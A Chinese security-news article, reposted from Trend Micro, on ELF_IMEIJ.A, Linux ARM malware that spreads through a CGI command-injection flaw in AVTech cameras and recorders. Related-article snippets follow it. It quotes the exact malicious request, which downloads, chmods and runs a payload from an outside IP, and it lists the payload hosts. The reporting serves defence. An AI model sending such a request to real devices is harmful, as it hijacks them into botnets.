趋势科技:恶意软件利用Linux CGI 漏洞进行传播

本文讲的是趋势科技:恶意软件利用Linux CGI 漏洞进行传播

Linux一直是企业平台和物联网制造商的首选操作系统,基于Linux的设备也被不断部署在许多不同行业的智能系统中,不过随着其广泛使用,我们也看到了以Linux为攻击目标的安全威胁数量正在快速上升。我们以前报告了2016年一系列的Linux威胁,其中最引人注目的是Mirai恶意软件。

最近检测到的一个针对Linux ARM的恶意软件ELF_IMEIJ.A(趋势科技检测并标记为ELF_IMEIJ.A)。ELF_IMEIJ.A利用了AVTech(一家监控技术公司)设备中的一个漏洞。该漏洞由Search-Lab(一个安全研究机构)发现并报告,并于2016年10月向AVTech披露。但是,截至目前似乎厂家还没有对这个漏洞进行修复。

ELF_IMEIJ.A和Mirai的比较

ELF_IMEIJ.A通过RFIs在cgi-bin脚本中进行传播。远程攻击者将此请求发送到随机IP地址,并尝试利用此漏洞:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

具体来说,ELF_IMEIJ.A就是利用AVTech所报告的CGI目录漏洞CloudSetup.cgi来执行触发恶意软件下载的命令注入。攻击者欺骗设备下载恶意文件,并更改文件的权限,最终进行恶意攻击。

ELF_IMEIJ.A的攻击起始于连接AVTech的设备,如支持AVTech云的IP摄像机,CCTV设备和网络录像机。一旦这些设备感染了这个恶意软件,恶意程序就会开始收集系统信息和用户的网络活动数据。它还可以执行来自恶意actor的shell命令,启动分布式拒绝服务(DDoS)攻击并让自己进入休眠状态。更危险的是,受感染的设备还会将连接到同一网络的其他设备也感染了。

目前,趋势科技检测到总共有三个IP地址可以下载ELF_IMEIJ.A,并且这三个IP都托管在两个单独的ISP上。

hxxp://172.247.116.3:8080/Arm1
hxxp://172.247.116.21:85/Arm1
hxxp://192.154.108.2:8080/Arm1

经过分析,托管的ISP位于韩国。

根据报道,AVTech目前已有超过13万个不同的设备连接到互联网,所以ELF_IMEIJ.A的攻击可以进行大规模的攻击,更糟的是,如果ELF_IMEIJ.A把这些设备可以变成网络僵尸,那可以用于发动大规模的DDoS攻击。与大多数网络连接设备一样,它们并不是默认安全的,不可能直接监控。

ELF_IMEIJ.A所带来的DDoS攻击可能会与Mirai比较相似,但他们也有明显的区别:

原文发布时间为:2017年3月20日

本文作者:xiaohui

本文来自合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。

原文链接

时间: 2024-10-26 21:13:03

趋势科技:恶意软件利用Linux CGI 漏洞进行传播的相关文章

黑客再次击中互联网心脏 Linux太符合RFC5961标准 所以出现Linux TCP漏洞

Linux真的很安全吗?研究员发现Linux TCP存在漏洞 CVE-2016-5696 ,黑客可能利用它绑架用户的通讯,或者注入恶意软件 ,还能让HTTPS加密连接失效.更糟糕的是,连Tor洋葱头翻墙软件及其网络也可能被绑架,细思极恐-- 在USENIX安全研讨会上,由加州大学河滨分校和美国陆军研究实验室6位研究员组成的团队进行了概念验证性质的演示,利用这个Linux TCP漏洞来探测两台主机是否基于TCP通信,并最终攻击了这两台主机间的流量. 结合研究员自己的说明及CVE-2016-5696

黑客利用安卓主密钥漏洞在华传播病毒

  本文讲的是 :   黑客利用安卓主密钥漏洞在华传播病毒 ,  7月25日消息,据国外媒体报道,网络安全技术开发商赛门铁克(Symantec)公司声明已确认第一个已知恶意利用Android主密钥漏洞.本月早些时候一家安全研究公司第一次公布该漏洞,并指出攻击者可以通过漏洞在运行谷歌操作系统的手机上安装代码,然后控制Android手机. 赛门铁克表示其研究人员已监控到中国已出现两个应用程序被黑客利用溢出感染. 谷歌已采取行动来解决问题,并在两周前给手机制造商发布补丁,但是补丁尚未普及到各手机用户手

微软调查通过USB传播的木马利用的安全漏洞

中介交易 http://www.aliyun.com/zixun/aggregation/6858.html">SEO诊断 淘宝客 云主机 技术大厅 微软正在调查一种通过USB设备传播的木马程序利用的安全漏洞.据安全专业人员称,这种恶意软件的攻击目标好像是公用事业行业. 这种恶意软件利用Windows处理"lnk"快捷方式文件中的一个安全漏洞.据一家位于白俄罗斯的安全厂商VirusBlokAda称,这种木马程序通过USB设备传播并且使用rootkit功能隐藏自己.然而,

Alpine Linux 之漏洞利用(二):软件包管理器漏洞分析

本文讲的是Alpine Linux 之漏洞利用(二):软件包管理器漏洞分析, 在Alpine Linux 漏洞利用的第一部分<Alpine Linux:从漏洞发现到代码执行>,我对Alpine Linux的软件包管理器中的两个关键漏洞, CVE-2017-9669和CVE-2017-9671做了深入的分析. 今天这部分,我会对这两个漏洞的发现过程进行详细描述,并演示如何实现远程执行代码. 第一步是把部署环境中导致 漏洞的所有内容都进行复制,由于这是一个可用性测试(sanity check),所

7年发现了新的Linux内核漏洞CVE-2017-2636 可以拿到root权限 影响大多数Linux版本

该Linux内核漏洞自2009年出现,波及大量的Linux发行版,包括Red Hat.Debian.Fedora.OpenSUSE和Ubuntu.事实证明,Linux上的漏洞都被利用了好长时间了,去年也有一次 绿盟科技发布Linux内核本地提权漏洞威胁预警通告 这个漏洞9年才被修复 Linux内核漏洞CVE-2017-2636 影响大多数Linux版本 最新的Linux内核漏洞(CVE-2017-2636)已在Linux内核中存在7年之久.未经授权的本地用户可利用该漏洞获得受影响系统的root权

潜伏7年的Linux内核漏洞CVE-2017-2636曝光,可本地提权

又一个古老的Linux内核漏洞被曝光!这次的漏洞可以追溯到2009年,影响的linux发行版包括Red Hat.Debian.Fedora.OpenSUSE和Ubuntu. 这个Linux漏洞编号为CVE-2017-2636,根据CVSS v3标准漏洞评分为7.8分.漏洞在Linux内核已经存在7年了,它能够让本地无权限的用户获取root权限,或者发动DoS让系统崩溃. Positive Technologies的研究员Alexander Popov发现了存在于N_HLDC linux内核驱动的

谷歌修复Linux内核漏洞未知风险

密钥环设施中的Linux内核漏洞可能允许利用提高特权以本地用户在内核中执行代码,不过该危险及其可能造成的影响已经为专家所重视. Perception Point研究小组在一篇博文中表示该漏洞自2012年起就一直存在于Linux内核中.该小组也创建了一个概念验证利用,不过该漏洞利用尚未外传. Perception Point研究小组称该Linux内核漏洞"已影响了近千万的Linux PC和服务器,66%的安卓设备,不过谷歌对其可能影响的安卓设备数量颇有微词. 尽管安卓是基于Linux内核的,然而不

Centos和Ubuntu怎么修复Linux Bash漏洞?

  日前Linux官方内置Bash中新发现一个非常严重安全漏洞,黑客可以利用该Bash漏洞完全控制目标系统并发起攻击,为了避免您Linux服务器受影响,建议您尽快完成漏洞修补. 今天Linux官方已经给出了Bash漏洞最新解决方案,还没有修复Bash漏洞的朋友,请尽快修复.以下是小编为大家附上最常用的Linux内核之centos和ubuntu服务器修复Bash漏洞终极修复方法. Centos和Ubuntu修复Linux Bash漏洞终极方法 目前已确认被成功利用的软件及系统:所有安装GNU ba

五种利用本地包含漏洞的方式

本文讲的是五种利用本地包含漏洞的方式,本地文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含.比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句<?php include fuction.php?>就可以调用内部定义的函数. 本地包含漏洞是PHP中一种典型的高危漏洞.由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server会将特定